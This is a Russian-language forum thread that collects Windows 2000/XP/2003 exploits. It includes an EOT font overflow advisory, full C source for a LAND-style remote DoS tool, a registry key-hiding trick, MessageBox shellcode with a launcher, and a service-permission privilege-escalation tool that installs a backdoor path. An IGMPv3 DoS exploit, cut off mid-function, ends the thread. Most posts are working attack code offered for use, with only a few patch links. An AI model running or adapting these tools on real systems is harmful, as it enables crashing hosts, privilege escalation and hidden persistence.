
Microsoft Windows 2k, XP exploits

Microsoft Windows 2000/2003/XP

Опасность: Критическая

Наличие эксплоита: Нет

Описание:
Уязвимость в Microsoft Windows позволяет удаленному пользователю скомпрометировать уязвимую систему.

Переполнение буфера возникает при обработке специально сформированных внедрённых (embedded) шрифтов. В результате удалённый атакующий может выполнить произвольный код, когда пользователь посещает специально сформированный веб-сайт или просматривает email-сообщение, содержащее такой встроенный веб-шрифт. (Судя по деталям ниже — T2EMBED.DLL, формат EOT, набор патчей — речь, по всей видимости, о бюллетене MS06-002; сверьте со списком обновлений.)

:zns2: Microsoft

Решение:

Microsoft Windows 2000 (requires Service Pack 4):
http://www.microsoft.com/downloads/details...4B-4146775BF590

Microsoft Windows XP (requires Service Pack 1 or 2):
http://www.microsoft.com/downloads/details...BD-B21AC75B5243

Microsoft Windows XP Professional x64 Edition:
http://www.microsoft.com/downloads/details...AB-3F833969E197

Microsoft Windows Server 2003 (with or without Service Pack 1):
http://www.microsoft.com/downloads/details...34-BDF0998869C5

Microsoft Windows Server 2003 (Itanium) (with or without SP1):
http://www.microsoft.com/downloads/details...4D-11EFA57D9CC5

Microsoft Windows Server 2003 x64 Edition:
http://www.microsoft.com/downloads/details...42-AF0D8A7BC388

Источник: SecurityLab
 
Обновлено:
Программа: Microsoft Windows 2000/2003/XP
Опасность: Критическая

Описание: Уязвимость в Microsoft Windows позволяет удаленному пользователю скомпрометировать уязвимую систему.

Уязвимость находится в коде распаковки EOT-шрифтов (Embedded OpenType). Подключить EOT-шрифт на странице можно через правило @font-face в таблице стилей, например:


Код:
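@font-face {
        font-family: Abysmal;
        font-style:  normal;
        font-weight: normal;
        src: url(evil.eot);   /* the crafted EOT file; IE hands it to T2EMBED.DLL for decompression */
}  /* closing brace was missing in the original snippet */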
Переполнение динамической памяти (кучи) находится в T2EMBED.DLL, которую Internet Explorer вызывает для обработки EOT-шрифтов. Данные внутри такого файла сжаты в формате Agfa MicroType Express и содержат LZ-сжатый поток с 24-битным полем размера. Функция MTX_LZCOMP_UnPackMemory выделяет буфер размером «значение этого поля + 1C00h», однако фактический объём распакованных данных перед копированием в буфер не проверяется. Таким образом, с помощью специально сформированного EOT-шрифта удалённый атакующий может перезаписать произвольный объём данных за границей буфера и выполнить произвольный код на целевой системе.

:zns2: Microsoft
Решение:

Microsoft Windows 2000 (requires Service Pack 4):
http://www.microsoft.com/downloads/details...4B-4146775BF590

Microsoft Windows XP (requires Service Pack 1 or 2):
http://www.microsoft.com/downloads/details...BD-B21AC75B5243

Microsoft Windows XP Professional x64 Edition:
http://www.microsoft.com/downloads/details...AB-3F833969E197

Microsoft Windows Server 2003 (with or without Service Pack 1):
http://www.microsoft.com/downloads/details...34-BDF0998869C5

Microsoft Windows Server 2003 (Itanium) (with or without SP1):
http://www.microsoft.com/downloads/details...4D-11EFA57D9CC5

Microsoft Windows Server 2003 x64 Edition:
http://www.microsoft.com/downloads/details...42-AF0D8A7BC388
 
Windows Server 2003 and XP SP2 remote DoS exploit

Код:
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sysexits.h>
#include <unistd.h>

/*
Windows Server 2003 and XP SP2 remote DoS exploit
Tested under OpenBSD 3.6 against WinXP SP2
Vuln by Dejan Levaja <dejan_@_levaja.com> , http://security.nnov.ru/docs7998.html
(c)oded by __blf 2005 RusH Security Team , http://rst.void.ru
Gr33tz: zZz, Phoenix, MishaSt, Inck-vizitor
f*** lamerz: Saint_I, nmalykh, Mr. Clumsy
All rights reserved.
*/

//checksum function by r0ach
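/*
 * Internet (RFC 1071) one's-complement checksum over len bytes at addr.
 * Returns the complemented 16-bit sum, ready to be stored in a header field.
 *
 * Fix: the original loop ran while i > 0, so for an odd len it consumed a
 * full 16-bit word past the end of the buffer and the trailing-byte branch
 * (i == 1) was unreachable.  The loop now stops at the last complete word
 * and the odd byte is folded in the endian-correct way (BSD in_cksum idiom).
 * u_short/u_char are the BSD spellings of the plain unsigned types used here.
 */
unsigned short checksum(unsigned short *addr, int len)
{
    unsigned short *w = addr;
    int i = len;
    unsigned int sum = 0;

    /* Sum 16-bit words; leave a dangling trailing byte for below. */
    while (i > 1) {
        sum += *w++;
        i -= 2;
    }

    /* Odd length: the last byte is the first byte of a word whose second
       byte is zero, whatever the host byte order. */
    if (i == 1) {
        unsigned short last = 0;
        *(unsigned char *)&last = *(unsigned char *)w;
        sum += last;
    }

    /* Fold the 32-bit accumulator down to 16 bits, adding back carries. */
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    return (unsigned short)~sum;
}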
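/*
 * Entry point: build a single TCP SYN whose source and destination address
 * and port are identical (the classic "LAND" packet) and hand it to a raw
 * socket with IP_HDRINCL.  argv[1] is used for BOTH src and dst and argv[2]
 * for BOTH ports; that reflexive packet is the whole point of the exploit,
 * not a typo.  Needs root for the raw socket.  Returns a sysexits(3) code.
 *
 * Fixes relative to the original: socket() failure is detected (it returns
 * -1, not 0); the address and port arguments are validated; the packet is
 * zero-filled before use (ip_id was sent uninitialised from malloc'd
 * memory); the destination sockaddr is zeroed; the raw socket is close()d
 * and the buffers freed on every path.
 */
int main(int argc, char **argv)
{
    struct in_addr src, dst;
    struct sockaddr_in sin;
    struct pseudohdr {
        struct in_addr source_addr;
        struct in_addr destination_addr;
        unsigned char zero;
        unsigned char protocol;
        unsigned short length;
    } pseudoheader;
    struct ip *iph;
    struct tcphdr *tcph;
    int mysock;
    unsigned char *packet;
    unsigned char *pseudopacket;
    int on = 1;
    long port;
    char *end;
    size_t pktlen = sizeof(struct ip) + sizeof(struct tcphdr);
    size_t pseudolen = sizeof(pseudoheader) + sizeof(struct tcphdr);

    if (argc != 3) {
        fprintf(stderr, "r57windos.c by __blf\n");
        fprintf(stderr, "RusH Security Team\n");
        fprintf(stderr, "Usage: %s <dest ip> <dest port>\n", argv[0]);
        return EX_USAGE;
    }

    /* inet_aton() returns 0 for a malformed address; the original ignored it. */
    if (!inet_aton(argv[1], &dst)) {
        fprintf(stderr, "bad IP address: %s\n", argv[1]);
        return EX_USAGE;
    }
    src = dst;                              /* reflexive source address */

    /* Port must be a number in 1..65535; atoi() silently accepted anything. */
    port = strtol(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || port < 1 || port > 65535) {
        fprintf(stderr, "bad port: %s\n", argv[2]);
        return EX_USAGE;
    }

    /* calloc: every header field starts at zero, including ip_id. */
    packet = calloc(1, pktlen);
    if (packet == NULL) {
        perror("malloc()");
        return EX_OSERR;
    }

    iph = (struct ip *)packet;
    iph->ip_v = IPVERSION;
    iph->ip_hl = 5;
    iph->ip_tos = 0;
    /* Byte order of ip_len/ip_off under IP_HDRINCL differs between BSDs and
       Linux; this is what the original sent and was tested on OpenBSD 3.6. */
    iph->ip_len = htons((unsigned short)pktlen);
    iph->ip_off = htons(IP_DF);
    iph->ip_ttl = 255;
    iph->ip_p = IPPROTO_TCP;
    iph->ip_sum = 0;                        /* filled in by the kernel */
    iph->ip_src = src;
    iph->ip_dst = dst;

    tcph = (struct tcphdr *)(packet + sizeof(struct ip));
    tcph->th_sport = htons((unsigned short)port);   /* same port both ways */
    tcph->th_dport = htons((unsigned short)port);
    tcph->th_seq = htonl((unsigned)rand());          /* unseeded rand(): fine for a one-shot SYN */
    tcph->th_ack = (unsigned)rand();
    tcph->th_off = 5;
    tcph->th_flags = TH_SYN;
    tcph->th_win = htons(512);
    tcph->th_sum = 0;
    tcph->th_urp = 0;

    /* TCP checksum covers the pseudo-header followed by the TCP header. */
    pseudoheader.source_addr = src;
    pseudoheader.destination_addr = dst;
    pseudoheader.zero = 0;
    pseudoheader.protocol = IPPROTO_TCP;
    pseudoheader.length = htons(sizeof(struct tcphdr));

    pseudopacket = malloc(pseudolen);
    if (pseudopacket == NULL) {
        perror("malloc()");
        free(packet);
        return EX_OSERR;
    }
    memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader));
    memcpy(pseudopacket + sizeof(pseudoheader), tcph, sizeof(struct tcphdr));
    tcph->th_sum = checksum((unsigned short *)pseudopacket, (int)pseudolen);
    free(pseudopacket);

    /* socket() returns -1 on failure; 0 would be a valid descriptor. */
    mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
    if (mysock < 0) {
        perror("socket");
        free(packet);
        return EX_OSERR;
    }
    if (setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) == -1) {
        perror("setsockopt");
        close(mysock);
        free(packet);
        return EX_OSERR;
    }

    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_addr = dst;
    sin.sin_port = htons(80);   /* as in the original; the port on the wire is the one in the TCP header */

    if (sendto(mysock, packet, pktlen, 0, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
        perror("sendto()");
        close(mysock);
        free(packet);
        return EX_OSERR;
    }
    printf("Packet sent. Remote machine should be down.\n");
    close(mysock);
    free(packet);
    return EX_OK;
}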

И откомпилированная версия:


Использование: w2k3 <dest ip> <dest port>
Из CMD, естественно.
 

XP SP2 Registry Backdoor
Обнаружен следующий сабж:
ключи и имена значений в реестре могут иметь лишь ограниченную длину (количество символов):

* Windows Server 2003 и Windows XP: 16,383 characters
* Windows 2000: 260 ANSI characters или 16,383 Unicode characters.
* Windows Me/98/95: 255 characters

Короче что это дает:
Идем в реестр, например в
Код:
HKLM\SOFTWARE\Mcft\Windows\CurrentVersion\Internet Settings\Empty

Создаем там стринг валью следующего содержания:

helloworldhelloworldhelloworldhelloworldhelloworldhelloworldhellowor ldhelloworldhelloworldhelloworldhelloworldhelloworldhelloworldhellow orldhelloworldhelloworldhelloworldhelloworldhelloworldhelloworldhell oworldhelloworldhelloworldhelloworldhelloworldhelloworl
Что вы там напихаете - не имеет значения.
Обновляем (F5) и видим, что ключ пропал из regedit. Даже после перезагрузки он там не появится; при этом данные, по всей видимости, остаются в кусте реестра — прежде чем считать их удалёнными, проверьте другим инструментом (reg.exe query, чтение файла куста).

Для чего это может пригодиться на практике, я не знаю. (Очевидное применение — прятать записи автозагрузки и т. п. от ручного осмотра в regedit; при расследовании инцидентов не полагайтесь на один только regedit.)

Проверено:
XP SP2 Eng, SP1 и 2K RUS, WinXP SP2 POL. Наверняка работает и на других. Попробуйте и отпишите результаты.
 
win32/xp sp2 Pop up message box 110 bytes

Код:
/*
Author : Omega7
Assembly Code : Steve Hanna
Changed by : Omega7
Description : It is 110 Byte Shellcode which Pops up Message Box Under Windows Xp SP2
If you Want to use it in any other Windows You need to change the address
that i have marked!

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * 110-byte Win32/x86 payload: LoadLibraryA("user32.dll"),
 * GetProcAddress(hUser32, "MessageBoxA"), MessageBoxA(0, "Omega7", "Omega7", 0),
 * then push 0 and call a third fixed address (an exit routine, judging by the
 * single zero argument -- the original comment does not label it).
 *
 * The three 4-byte absolute addresses are kernel32 exports of ONE specific
 * build (XP SP2 per the author); they are not stable across service packs,
 * languages or ASLR (Vista+).  Note that only two of the three are marked.
 * The 'N' (\x4e) after each string is a placeholder that the code overwrites
 * with 0 at run time (mov [ecx+n], dl), so the payload contains no NUL bytes.
 */
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb"   /* zero eax/ebx/ecx/edx; jmp to call-back; pop ecx = "user32.dll"; NUL-terminate it; mov ebx, <addr> */
"\x77\x1d\x80\x7c"    //***LoadLibraryA(libraryname) IN WinXP sp2***
"\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb"       /* push ecx; call ebx; pop ecx = "MessageBoxA"; NUL-terminate; push name, push hmodule; mov ebx, <addr> */
"\x28\xac\x80\x7c"   //***GetProcAddress(hmodule,functionname) IN sp2***
"\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x06\x31\xd2\x52\x51"       /* call ebx; pop ecx = "Omega7"; NUL-terminate; push 0, push text, ... */
"\x51\x52\xff\xd0\x31\xd2\x50\xb8\xa2\xca\x81\x7c\xff\xd0\xe8\xc4\xff"   /* ... push caption, push 0; call eax (MessageBoxA); push 0; mov eax, 0x7c81caa2 (third, UNMARKED absolute address); call eax */
"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"   /* "user32.dll" + 'N' placeholder, then call back */
"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"   /* "MessageBoxA" + 'N' placeholder, then call back */
"\xff\x4f\x6d\x65\x67\x61\x37\x4e";                                      /* "Omega7" + 'N' placeholder */

/* MessageBox shellcode for Windows XP SP2 */

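/*
 * Test harness: print the payload length and jump into it.
 *
 * The original overwrote its own saved return address through
 * `(int *)&ret + 2`, which assumes one particular 32-bit frame layout (no
 * frame-pointer omission, no stack cookie, pointer-sized ints) and is
 * undefined behaviour; calling the bytes through a function pointer runs the
 * same payload without that assumption.  stdout is flushed first because the
 * payload ends in an exit call and control is not expected to return here.
 * On any system with DEP/NX the call still faults: `shellcode` lives in a
 * non-executable data section.
 */
int main(void)
{
    void (*entry)(void);

    printf("Shellcode Length is : %d", (int)strlen(shellcode));
    fflush(stdout);

    /* Object-to-function pointer cast: implementation-defined, but the
       conventional idiom on Win32/x86 and what the original relied on anyway. */
    entry = (void (*)(void))shellcode;
    entry();
    return 0;
}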

(с)
 
Повышение привилегий в Microsoft Windows
Программа:
Microsoft Windows XP SP1
Microsoft Windows Server 2003
Описание:
Уязвимость позволяет локальному пользователю повысить свои привилегии на системе.

Уязвимость существует из-за наличия небезопасных SERVICE_CHANGE_CONFIG разрешений для служб UPnP, NetBT, SCardSvr и SSDP. Локальный пользователь может с помощью уязвимого сервиса запустить злонамеренное приложение и повысить свои привилегии на системе.

Эксплоит:
SrvCheck.c
Код:
/*
* Privilege Checker for Windows Services
* (c) 2006 Andres Tarasco ( atarasco _at_ gmail.com )
* http://www.haxorcitos.com
*
* Based on Sudhakar Govindavajhala and Andrew Appel paper
* http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf
*
* usage:
* You should execute this tool without Admin privileges on the target system
* using for example an user account
*
* srvcheck.exe -l              - show vulnerable services
* srvcheck.exe -m Service PATH - modify service configuration (install backdoor)
*
* Example for Windows XP SP2 computer

D:\>whoami
HXR\test

D:\>net user test |find "grupo"
Miembros del grupo local                    *Usuarios
Miembros del grupo global                   *Ninguno

D:\>srvchecker.exe -l
Services Permissions checker
[SSDPSRV]               Servicio de descubrimientos SSDP
Status: 0x1
Path: C:\WINDOWS\System32\svchost.exe -k LocalService

[upnphost]              Host de dispositivo Plug and Play universal
Status: 0x1
Path: C:\WINDOWS\System32\svchost.exe -k LocalService

You were Lucky. 2 services found

D:\>srvchecker -m upnphost c:\windows\temp\backdoor.exe
Services Permissions checker
(c) 2006 Andres Tarasco - atarasco _at_ gmail.com

service modified =)

D:\>net start upnphost
*
* NOTE: This code compiles under Borland C++ Builder
*
*/
#include <stdio.h>
#include <windows.h>

void doFormatMessage( unsigned int dwLastErr );

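/*
 * Entry point.
 *   -l                : enumerate services and list those this (non-admin)
 *                       account can open with SERVICE_CHANGE_CONFIG, i.e.
 *                       whose DACL lets it rewrite the binary path.
 *   -m SRVNAME PATH   : point SRVNAME's binary path at PATH and set it to
 *                       auto-start; the service then runs PATH in its own
 *                       account (the privilege-escalation step).
 *
 * Fixes relative to the original: argument counts are checked exactly
 * (argc==3 or 5 slipped through, and "-m" with argc==3 passed a NULL path);
 * the memset that cleared sizeof(pointer) bytes is dropped (LPTR already
 * zero-fills); the enumeration buffer is sized from the API's own
 * "bytes needed" answer instead of a fixed 64 KiB; each per-service handle
 * and QUERY_SERVICE_CONFIG buffer is released instead of leaked; the stray
 * "\N" escape in "No luck" is corrected; main returns 0 on success.
 */
int main(int argc, char *argv[])
{
    SC_HANDLE SCM;
    LPENUM_SERVICE_STATUS_PROCESS lpServices = NULL;
    DWORD nBufSize = 0;
    DWORD nSize = 0;
    DWORD nServicesReturned = 0;
    DWORD nResumeHandle = 0;
    SC_HANDLE Svc;
    LPQUERY_SERVICE_CONFIG lpConfig;
    DWORD dwByteNeeded;
    DWORD dwCfgSize;
    DWORD n;
    BYTE LIST = 0;
    unsigned int l = 0;
    int rc = 0;

    printf(" Services Permissions checker\n");
    printf(" (c) 2006 Andres Tarasco - atarasco _at_ gmail.com\n\n");

    if (argc == 2 && strcmp(argv[1], "-l") == 0) {
        LIST = 1;
    } else if (!(argc == 4 && strcmp(argv[1], "-m") == 0)) {
        printf("Usage:\n\t-l (list vulnerable services)\n");
        printf("\t-m SRVNAME NewPath (change the configuration for that service)\n");
        return 1;
    }

    /* Ask the SCM only for what each mode needs; the interesting access
       check happens per service in OpenService() below. */
    SCM = OpenSCManager(NULL, NULL, LIST ? SC_MANAGER_ENUMERATE_SERVICE : SC_MANAGER_CONNECT);
    if (!SCM) {
        printf("OpenScManager FAILED\n");
        doFormatMessage(GetLastError());
        return -1;
    }

    if (LIST) {
        /* First call with no buffer just reports the size needed (ERROR_MORE_DATA). */
        EnumServicesStatusEx(SCM, SC_ENUM_PROCESS_INFO, SERVIC E_WIN32 | SERVICE_DRIVER,
                             SERVICE_STATE_ALL, NULL, 0, &nSize, &nServicesReturned,
                             &nResumeHandle, NULL);
        if (GetLastError() != ERROR_MORE_DATA || nSize == 0) {
            printf("EnumServicesStatusEx FAILED\n");
            doFormatMessage(GetLastError());
            CloseServiceHandle(SCM);
            return -1;
        }
        nBufSize = nSize;
        lpServices = (LPENUM_SERVICE_STATUS_PROCESS) LocalAlloc(LPTR, nBufSize);  /* LPTR zero-fills */
        if (!lpServices) {
            printf("LocalAlloc Failed\n");
            CloseServiceHandle(SCM);
            return -1;
        }
        nResumeHandle = 0;
        if (EnumServicesStatusEx(SCM, SC_ENUM_PROCESS_INFO, SERVICE_WIN32 | SERVICE_DRIVER,
                                 SERVICE_STATE_ALL, (LPBYTE)lpServices, nBufSize,
                                 &nSize, &nServicesReturned, &nResumeHandle, NULL) == 0) {
            printf("EnumServicesStatusEx FAILED\n");
            doFormatMessage(GetLastError());
            LocalFree(lpServices);
            CloseServiceHandle(SCM);
            return -1;
        }

        for (n = 0; n < nServicesReturned; n++) {
            /* The vulnerability test: can this user open the service with
               SERVICE_CHANGE_CONFIG?  If so its DACL is too permissive.
               SERVICE_QUERY_CONFIG is the only extra right needed, for the
               path lookup below (the original asked for GENERIC_READ and a
               mis-named SC_MANAGER_* bit as well). */
            Svc = OpenService(SCM, lpServices[n].lpServiceName,
                              SERVICE_CHANGE_CONFIG | SERVICE_QUERY_CONFIG);
            if (Svc != NULL) {
                l++;
                printf("[%s]\t\t%s\n", lpServices[n].lpServiceName, lpServices[n].lpDisplayName);
                printf("Status: 0x%x\n", (unsigned)lpServices[n].ServiceStatusProcess.dwCurrentState);

                /* Size the config buffer from the API's own answer; fall back
                   to the original 1 KiB if it did not report one. */
                dwByteNeeded = 0;
                QueryServiceConfig(Svc, NULL, 0, &dwByteNeeded);
                dwCfgSize = dwByteNeeded ? dwByteNeeded : 1024;
                lpConfig = (LPQUERY_SERVICE_CONFIG) LocalAlloc(LPTR, dwCfgSize);
                if (lpConfig == NULL) {
                    printf("LocalAlloc Failed\n");
                } else {
                    if (QueryServiceConfig(Svc, lpConfig, dwCfgSize, &dwByteNeeded) != 0) {
                        printf("Path: %s\n\n", lpConfig->lpBinaryPathName);
                    } else {
                        doFormatMessage(GetLastError());
                    }
                    LocalFree(lpConfig);
                }
                CloseServiceHandle(Svc);
            }
        }
    } else {
        Svc = OpenService(SCM, argv[2], SERVICE_CHANGE_CONFIG);
        if (Svc != NULL) {
            /* Only the binary path, start type (auto) and error control
               (ignore) change.  The "" for lpDependencies is kept from the
               original; note an empty string clears the dependency list
               rather than leaving it alone (NULL would). */
            if (ChangeServiceConfig(Svc, SERVICE_NO_CHANGE, SERVICE_AUTO_START, SERVICE_ERROR_IGNORE,
                                    argv[3], NULL, NULL, "", NULL, NULL, NULL) != 0) {
                printf("service modified =)\n");
            } else {
                printf("modification failed\n");
                doFormatMessage(GetLastError());
                rc = 1;
            }
            CloseServiceHandle(Svc);
        } else {
            printf("Unable to open Service %s\n", argv[2]);
            doFormatMessage(GetLastError());
            rc = 1;
        }
    }

    if (LIST) {
        if (l > 0)
            printf("\n You were Lucky. %u services found\n", l);
        else
            printf("\nNo luck\n");
    }

    CloseServiceHandle(SCM);
    if (lpServices)
        LocalFree(lpServices);
    return rc;
}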




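/*
 * Print a human-readable description of a Win32 error code to stdout, in the
 * original layout "Error: ERRORCODE <n>: <msg>\n\n".
 *
 * Fixes: lpMsgBuf is initialised and FormatMessage's return value is checked
 * (on failure the original passed an uninitialised pointer to sprintf); the
 * 512-byte intermediate buffer and its unbounded sprintf are gone -- the
 * message is printed directly; the code is printed as unsigned.
 * The (LPTSTR)&lpMsgBuf cast assumes a non-UNICODE build, as the original did.
 */
void doFormatMessage(unsigned int dwLastErr)
{
    LPVOID lpMsgBuf = NULL;
    DWORD len;

    len = FormatMessage(
        FORMAT_MESSAGE_ALLOCATE_BUFFER |
        FORMAT_MESSAGE_IGNORE_INSERTS |
        FORMAT_MESSAGE_FROM_SYSTEM,
        NULL,
        dwLastErr,
        MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
        (LPTSTR)&lpMsgBuf,
        0,
        NULL);

    if (len == 0 || lpMsgBuf == NULL) {
        /* No text available for this code; still report the number. */
        printf("Error: ERRORCODE %u: (no description)\n\n", dwLastErr);
        return;
    }
    printf("Error: ERRORCODE %u: %s\n\n", dwLastErr, (const char *)lpMsgBuf);
    LocalFree(lpMsgBuf);
}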
Решение: установите SP2 для Windows XP и SP1 для Windows Server 2003, а также выполните указания из уведомления производителя (по всей видимости, бюллетень MS06-011 о слишком разрешительных DACL служб; там же описано, как вручную сузить права на службы).
:zns2: производитель
 
MS Windows XP/2003 (IGMP v3) Denial of Service Exploit

Эксплоит:
Код:
/* 
        IGMP v3 DoS Exploit 

        ref: http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html 
        ref: http://www.Mcft.com/technet/security/Bulletin/MS06-007.mspx 


        by Alexey Sintsov (dookie@inbox.ru) 


        Req: 

                Administrator rights on system 
                Windows Firewall off (for sending RAW packets) 

        Affected Products: 
                Mcft Corporation Windows XP All 
                Mcft Corporation Windows Server 2003 All 
 */ 


#include <stdio.h> 
#include <winsock2.h> 


#pragma comment(lib, "Ws2_32.lib") 

/*
 * Wire layout of the IPv4 header this tool sends: the 20 standard bytes plus
 * 4 bytes of options, 24 bytes total (IHL 6).  Field order and widths match
 * the protocol, so the struct is memcpy'd straight into the send buffer;
 * there is no packing pragma, but every field is naturally aligned.
 */
typedef struct iphdr
{
        unsigned char  verlen;                  // IP version & length  (version in high nibble, IHL in dwords in the low nibble)
        unsigned char  tos;                     // Type of service
        unsigned short total_len;               // Total length of the packet (network order)
        unsigned short ident;                   // Unique identifier
        unsigned short frag_and_flags;          // Flags
        unsigned char  ttl;                     // Time to live
        unsigned char  proto;                   // Protocol (TCP, UDP etc) -- IPPROTO_IGMP here
        unsigned short checksum;                // IP checksum
        unsigned int   sourceIP;                // Source IP (network order, as returned by inet_addr)
        unsigned int   destIP;                  // Destination IP
        unsigned short  options[2];             // 4 option bytes; sent as zeros (see sendIGMP)
} IPHEADER;

/*
 * IGMPv3 Membership Query, 16 bytes: fixed 12-byte query header followed by
 * one source address (num == 1).  `unsigned long` is 4 bytes on Win32/Win64
 * (LLP64); on an LP64 Unix it would be 8 and break this layout -- the file
 * is Winsock-only, so that is moot here.
 */
typedef struct igmphdr {
          unsigned char                 type;       // 0x11 = Membership Query
          unsigned char                 code;       // Max Resp Code
          unsigned short                checksum;   // one's-complement checksum over the 16 bytes
          unsigned long                 group;      // group address (0.0.0.0 = general query)
          unsigned char                 ResvSQVR;   // Resv / S flag / QRV
          unsigned char                 QQIC;       // Querier's Query Interval Code
          unsigned short                num;        // number of source addresses that follow
          unsigned long                 addes;      // the single source address
 } IGMPHEADER;






/*
 * RFC 1071 one's-complement checksum over `size` bytes of `buffer`.
 * Returns the complemented 16-bit sum, ready for an IP/IGMP header field.
 * An odd trailing byte is added as-is (low byte, little-endian host).
 */
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long acc = 0;
    const USHORT *p = buffer;
    int remaining;

    /* whole 16-bit words */
    for (remaining = size; remaining > 1; remaining -= (int)sizeof(USHORT))
        acc += *p++;

    /* odd trailing byte, if any */
    if (remaining)
        acc += *(const UCHAR *)p;

    /* fold carries back into the low 16 bits */
    acc = (acc >> 16) + (acc & 0xffff);
    acc += acc >> 16;

    return (USHORT)(~acc);
}

/*
 * Build one raw IPv4 packet carrying an IGMPv3 Membership Query and send it
 * to b (target) with spoofed source address a.  Returns 1 on success, 0 or
 * FALSE on any Winsock failure (main() cannot tell those apart).
 *
 * Review notes:
 *  - inet_addr() results are not checked: a bad string yields INADDR_NONE
 *    (0xffffffff) and the packet simply goes to/from 255.255.255.255.
 *  - Raw socket with IP_HDRINCL, i.e. Administrator, and the Windows
 *    Firewall off (see the header comment).
 */
int sendIGMP(char* a, char* b)
{
        unsigned int dst_addr, src_addr;

        IPHEADER ipHeader;              /* not zeroed: every field used is assigned below */
        IGMPHEADER igmpHeader;

        dst_addr=inet_addr (b);
        src_addr=inet_addr (a);

        /* 24 (IP + 4 option bytes) + 16 (IGMP) + 4 zero pad = 44 bytes used */
        char szSendBuf[60]={0};
        int rect;

        WSADATA WSAData;
        if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0)
                return FALSE;

        SOCKET sock;
        /* IPPROTO_RAW: we supply the IP header; the 0x01 flag is WSA_FLAG_OVERLAPPED */
        if ((sock = WSASocket(AF_INET,SOCK_RAW,
                IPPROTO_RAW,NULL,0, 0x01)) == INVALID_SOCKET) {
                printf("Create socket error");
                WSACleanup();
                return FALSE;
        }

        BOOL flag=TRUE;
        /* option 2 at level IPPROTO_IP is IP_HDRINCL in Winsock; the header in
           szSendBuf is sent as-is except for fields the stack fills in itself */
        if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag)) ==
SOCKET_ERROR) {
                printf("Set options error");
                closesocket(sock);
                WSACleanup();
                return FALSE;
        }

        SOCKADDR_IN ssin;
        memset(&ssin, 0, sizeof(ssin));
        ssin.sin_family=AF_INET;
        ssin.sin_port=htons(99);        /* meaningless for raw IGMP; only the address matters */
        ssin.sin_addr.s_addr=dst_addr;

        /* version 4, IHL = sizeof(IPHEADER)/4 = 6 dwords: 20-byte header + the 4 option bytes */
        ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));

        ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(igmpHeader));

        ipHeader.ident=htons(0);

        ipHeader.frag_and_flags=0;

        ipHeader.ttl=128;
        ipHeader.proto=IPPROTO_IGMP;

        ipHeader.checksum=0;

        ipHeader.tos=0;

        ipHeader.destIP=dst_addr;
        ipHeader.sourceIP=src_addr;     /* spoofed; taken from argv in main() */

        //Ip options
        /* four zero option bytes behind a 24-byte IHL; per the author this
           option layout is what triggers the MS06-007 crash */
        ipHeader.options[0]=htons(0x0000); //bug is here =)
        ipHeader.options[1]=htons(0x0000);

        igmpHeader.type=0x11; //v3 Membership Query
        igmpHeader.code=5;                      /* Max Resp Code */
        igmpHeader.num=htons(1);                /* one source address follows */
        igmpHeader.ResvSQVR=0x0;
        igmpHeader.QQIC=0;
        igmpHeader.group=inet_addr("0.0.0.0");  /* general query */
        igmpHeader.addes=dst_addr;              /* the single source address: the target itself */

        igmpHeader.checksum=0;

        /* IGMP checksum over the 16-byte IGMP header (unsigned long is 4 bytes on Win32) */
        memcpy(szSendBuf, &igmpHeader, sizeof(igmpHeader));

        igmpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(igmpHeader));

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
        memcpy(szSendBuf+sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader));
        memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4);

        /* NOTE(review): two oddities.  The IP checksum is computed over the
           header AND the IGMP payload (effectively harmless only because the
           IGMP checksum makes its own region sum to zero), and the result is
           then byte-swapped by ntohs() although checksum() already returns it
           in wire order.  This presumably works only because the Windows stack
           recomputes the IP checksum for IP_HDRINCL sends -- confirm with a
           packet capture before porting this anywhere else. */
        ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf,
sizeof(ipHeader)+sizeof(igmpHeader)));

        memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));

        rect=sendto(sock, szSendBuf,
sizeof(ipHeader)+sizeof(igmpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));

        if (rect==SOCKET_ERROR) {
                printf("Send error: <%d>\n",WSAGetLastError());
        closesocket(sock);
                WSACleanup();
                return 0;
        }

        closesocket(sock);
        WSACleanup();

return 1;

}



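/*
 * Entry point: igmps.exe <target ip> <source ip>.
 *
 * Both arguments are required.  The original tested `argc < 2` and then
 * dereferenced argv[2], so running it with a single argument crashed inside
 * inet_addr(NULL); the check is now `argc < 3`.  main also gets an explicit
 * return type (implicit int is not valid C99+), and the exit status reflects
 * whether sendIGMP() reported success.
 */
int main(int argc, char **argv)
{
        if (argc < 3) {
                printf("\nIGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)\n\n");
                printf("Usage:\n");
                printf("c:\\igmps.exe <target ip> <source ip>\n\n");
                return 0;
        }

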